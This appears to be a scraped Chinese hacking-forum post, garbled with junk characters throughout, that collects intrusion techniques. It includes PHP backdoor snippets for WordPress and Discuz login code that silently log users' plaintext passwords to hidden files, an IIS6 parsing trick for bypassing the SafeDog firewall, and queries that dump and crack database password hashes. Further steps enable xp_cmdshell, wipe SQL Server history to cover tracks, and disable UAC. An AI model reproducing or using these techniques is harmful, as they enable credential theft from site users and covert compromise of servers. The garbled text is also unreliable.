if($log_user&&$log_pwd&&$log_ip){. X# d- h& [5 ~' A+ q+ j
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);" u. a# J. f! E5 N7 c: H- i
}
0 O" l) s; M# k; t, I当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。& R5 i8 E: ]5 Q. }/ \
就是搜索case ‘login’/ j' e8 ^0 A3 |5 e
在它下面直接插入即可,记录的密码生成在pwd.txt中,( v' u( H" r4 N0 B
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录9 ]% L( O! l* y; g. e; t1 g" p
利用II6文件解析漏洞绕过安全狗代码:" R& J! J! ^; o, o8 H
;antian365.asp;antian365.jpg  o0 \1 B. |$ F
% g8 ~3 r, p) ?$ L# U
各种类型数据库抓HASH破解最高权限密码!
$ f9 b! N7 q& @5 ]4 \) P- h1.sql server20000 F% E1 j, M4 W' }+ Q3 |
SELECT password from master.dbo.sysxlogins where name='sa'
1 s+ z4 n6 g2 J4 s! a0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
# S5 m! `; _8 w- h1 M* z1 V' b2 h2FD54D6119FFF04129A1D72E7C3194F7284A7F3A* a0 F/ m: K% ?" F

# o2 |0 G$ R* m0×0100- constant header# X, m" y' P( {& n/ Q
34767D5C- salt
" l/ {2 `( k9 Q0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash$ B( q1 z3 m/ x; a# c; C: E0 ^3 u  k6 W
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
7 ]/ S  p% F# X9 L' G+ L/ ycrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
  m& Y- Y) k3 H4 ^3 r4 NSQL server 2005:-! G1 Z) Y! F" z" R1 y9 _: O$ e
SELECT password_hash FROM sys.sql_logins where name='sa'
1 X( X; N! v, j" u0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F! N* C+ B2 |/ K" P# i
0×0100- constant header6 x# k9 q8 l, @" H7 n
993BF231-salt& F6 r0 j4 ~9 V: c! O! @
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
7 b0 y/ g- y  I# o5 K* |* x8 d- Ycrack case sensitive hash in cain, try brute force and dictionary based attacks.
' @9 O) G, C8 t/ V/ R& h: f2 f; \3 g0 Z
update:- following bernardo’s comments:-+ d  \' R. |# H9 j" i2 N3 p
use function fn_varbintohexstr() to cast password in a hex string./ d3 E2 ~/ G% `$ E; Q% |' S) Q
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
8 _2 h+ x  ?% \) K$ d* T: T' s5 U- ?+ U9 j9 |% m
MYSQL:-
* G7 j" \1 A2 ~0 V+ |: o' ~) ?. R
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
+ M0 y& R3 B, Q4 h" s. ]. F7 C' ?8 D. H* \+ g
*mysql  < 4.1
% d# X  J: ]! B- U9 n  J$ L! [5 h& T& p) ~" ]& ^
mysql> SELECT PASSWORD(‘mypass’);
4 A1 {" B3 ~; ^+ S+——————–+
0 T) M2 f/ B) `2 J| PASSWORD(‘mypass’) |$ d1 L7 F8 X4 Y! s* r
+——————–+4 g- ^: z2 Z  R6 y0 J
| 6f8c114b58f2ce9e   |& h! ?, N5 D3 _8 X7 l" Q( k
+——————–+
5 z% F4 r( u) ]; f) _- f7 }/ y% q1 H& R: C3 x- R
*mysql >=4.1
7 X, W' x4 b& f( D- g0 E/ V* w& E/ o# _5 D( d( D% E
mysql> SELECT PASSWORD(‘mypass’);6 K7 L6 ^* w; M6 p5 t8 c, u# R
+——————————————-+
9 d* y* @* Q" s" W, _4 B| PASSWORD(‘mypass’)                        |
' m8 O9 W/ L, ?+ I$ k9 u+——————————————-+
6 f0 `5 y, L4 L+ i+ c& c| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
8 H* f2 E( E4 R+ p% b& q, y+——————————————-+4 l' g  d/ l# q% s" a- x) C: C
8 V8 {( I/ A2 O# Y5 A9 P* p
Select user, password from mysql.user. w; b) J9 ?, P  y0 q; f- P
The hashes can be cracked in ‘cain and abel’
" Y1 }& Y4 Y+ ~0 D
: Q2 R7 n8 T9 x  R0 F4 iPostgres:-* o: f1 s1 d6 S7 u9 q+ \! I; ]
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
) ~2 c# R3 x$ \9 O3 H4 Sselect usename, passwd from pg_shadow;) ?4 K  B; O- `8 }
usename      |  passwd# q  C  a8 k. G* b- ~3 Q
——————+————————————-' U; e4 Q, z3 _/ H* N' |
testuser            | md5fabb6d7172aadfda4753bf0507ed43960 R& X' k. z5 ?3 T, N( c$ X
use mdcrack to crack these hashes:-
% j( K2 e3 ]8 |' d, [4 x3 B9 K$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
; V5 j' ]. ?/ a& ~0 x# ^+ ~
0 G. {/ T9 \) ^, z. o/ T( T6 vOracle:-) ?% ?1 R, l  H6 e
select name, password, spare4 from sys.user$9 h" {* q( b8 m, R$ {
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
3 `, Z2 V% s+ J9 [5 FMore on Oracle later, i am a bit bored….) c7 U2 f/ K* U  P) v

. w" k8 ?  {& _+ [6 `$ l. C- u8 Y  H  _- t3 w& O
在sql server2005/2008中开启xp_cmdshell+ G% I2 T, X# C/ q! |6 }+ ]
-- To allow advanced options to be changed.
% J/ `+ M4 |% I+ FEXEC sp_configure 'show advanced options', 17 V' r3 `7 l: b' T; z: M3 r1 \9 Y/ o
GO
$ W5 P% v, \, `6 k  k, a+ x3 |; P-- To update the currently configured value for advanced options.
8 o2 w. M: a% \" }% S! F9 HRECONFIGURE$ y" x0 b5 U& S; H
GO
" ?, Y) w# l0 L-- To enable the feature.: W# [9 g1 z7 Z: X6 G
EXEC sp_configure 'xp_cmdshell', 1
3 N. u9 y$ `- R, ~GO& D: y4 Z6 I# t0 j& J/ L, _- x9 }
-- To update the currently configured value for this feature.3 i3 S& q! j$ J2 d/ n6 I
RECONFIGURE/ v0 y! q, c/ b3 ^/ F* k5 b
GO/ X6 a/ f" R; Z$ Y; O0 e1 y
SQL 2008 server日志清除,在清楚前一定要备份。8 r# W/ C& y& t& r
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:% B; l+ |) |; W  ?" {2 p
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
1 R, f  O  I- I
2 `  n3 X$ y- R8 L对于SQL Server 2008以前的版本:
  q  ?3 g' e4 ^4 ?SQL Server 2005:
- y" r6 A# o0 m6 a& u9 K删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat/ ]; D" P* [2 a
SQL Server 2000:
6 i% h3 `* ^+ [清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
& _0 f3 c; i+ @3 H9 j/ C' a! M4 [! Y3 i. ^
本帖最后由 simeon 于 2013-1-3 09:51 编辑
/ W5 Z  v8 t# x- e5 ~, }. ]& u
9 X7 R8 p4 L  X0 L' G+ |0 `+ t% y2 m1 z) _0 q* E
windows 2008 文件权限修改
7 X, x: A) u# q4 G1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx; A: ]* t+ b+ w, s  G4 G0 `
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98. s. u) Y& w* q  p  ~
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,* I0 V, @2 f3 T% y/ H* v
& s  i9 Y) i% [) g, ?+ x/ Y
Windows Registry Editor Version 5.00
( d0 z4 ~5 i  _8 \! ]$ P4 b  w8 n[HKEY_CLASSES_ROOT\*\shell\runas], l: A( X6 q$ E: ]4 ]: ?
@="管理员取得所有权") T) L- K% x$ C( ~
"NoWorkingDirectory"=""/ B4 q; Q' N- r; Z
[HKEY_CLASSES_ROOT\*\shell\runas\command]
, b" F! q. D4 ^9 M7 l, q@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
  A9 V( ?; Q. Q3 _/ y0 U$ z2 J  {* e"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" M; X. q1 G) ^; P; P2 t- d* g[HKEY_CLASSES_ROOT\exefile\shell\runas2]
) Q; R2 l+ X! v" @@="管理员取得所有权"1 M! Q6 |$ }; r+ d5 L* |$ u
"NoWorkingDirectory"=""% a: F! Z  A# y* {+ a" Z
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]1 a+ s: _8 F) i  Z# I8 V4 `+ o
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* \) F6 v  T. s# G: j. p
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"4 m4 d# `# A* \6 P. s* K

$ t* g1 |7 j5 ]( E+ I# ]1 h+ f[HKEY_CLASSES_ROOT\Directory\shell\runas]5 y( Q) V* ]: N5 m; H
@="管理员取得所有权"0 P1 I% N# V! A- P
"NoWorkingDirectory"=""6 ^3 H4 v2 W% |- q3 [2 Q
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]' i6 x4 l+ T  {# ?, `- k- y
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t") k$ i, j- Q1 j/ E, h6 }) p
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"* K) E" Q/ y1 H9 g
3 ?; O, k8 z' F0 i  L, [6 W# l) z
0 N- T2 n- a3 R; j6 N: g5 x" O) Y
win7右键“管理员取得所有权”.reg导入
: e, Q0 Z3 I. J3 `+ _2 r: Z1 g二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,$ v9 v; f6 T/ p, i( ^- ]
1、C:\Windows这个路径的“notepad.exe”不需要替换
( G$ H# r% D5 p* G2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
3 X3 _: ~, m7 n, c3 p" V7 n3、四个“notepad.exe.mui”不要管
5 F5 B3 I# |9 W, ^4 Z4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和  _; C$ l' M& Y8 \; n9 e
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”1 W: e1 C  w: [5 I2 M) h+ c
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
3 J  s: c! Z. B6 x& _" `7 o3 ^( j替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
9 @1 S2 p# ?; l& Owindows 2008中关闭安全策略:
* ~" j  U4 l, d8 K, P) E: _0 Areg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
7 Z% S6 _, b9 P  L5 h$ Y( ]8 i修改uc_client目录下的client.php 在" h* e" W+ w6 X# n$ c7 W! J
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
* Q3 v; U4 Q" e, k( ^2 ]下加入如上代码,在网站./data/cache/目录下自动生成csslog.php4 Q( [& o& {+ D
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
. ?/ m  o* H" U4 K# ~7 pif(getenv('HTTP_CLIENT_IP')) {5 D, J( n) `4 H( l' ~) x
$onlineip = getenv('HTTP_CLIENT_IP');9 i, e- g2 M7 e* Y" F
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
" x$ j2 j- T) [$onlineip = getenv('HTTP_X_FORWARDED_FOR');
4 H, Y2 ^5 `1 w% g0 {0 F4 ]} elseif(getenv('REMOTE_ADDR')) {+ l( V# h( K2 \8 u
$onlineip = getenv('REMOTE_ADDR');
/ ^" {; _. p7 A/ P: m} else {
1 b" V/ W: Z+ U, E% {$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$ B6 e% N3 G/ D3 J6 ~, I3 ]}0 x  T" {1 Q, f6 Y' f9 t# e
     $showtime=date("Y-m-d H:i:s");4 M' @$ S6 `6 s$ M: Y; ?8 o8 U
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
+ F5 q0 U3 p9 i" X4 p. i7 U% d+ i    $handle=fopen('./data/cache/csslog.php','a+');
7 C, p, Z% a, ]$ s2 @3 y. u$ V    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表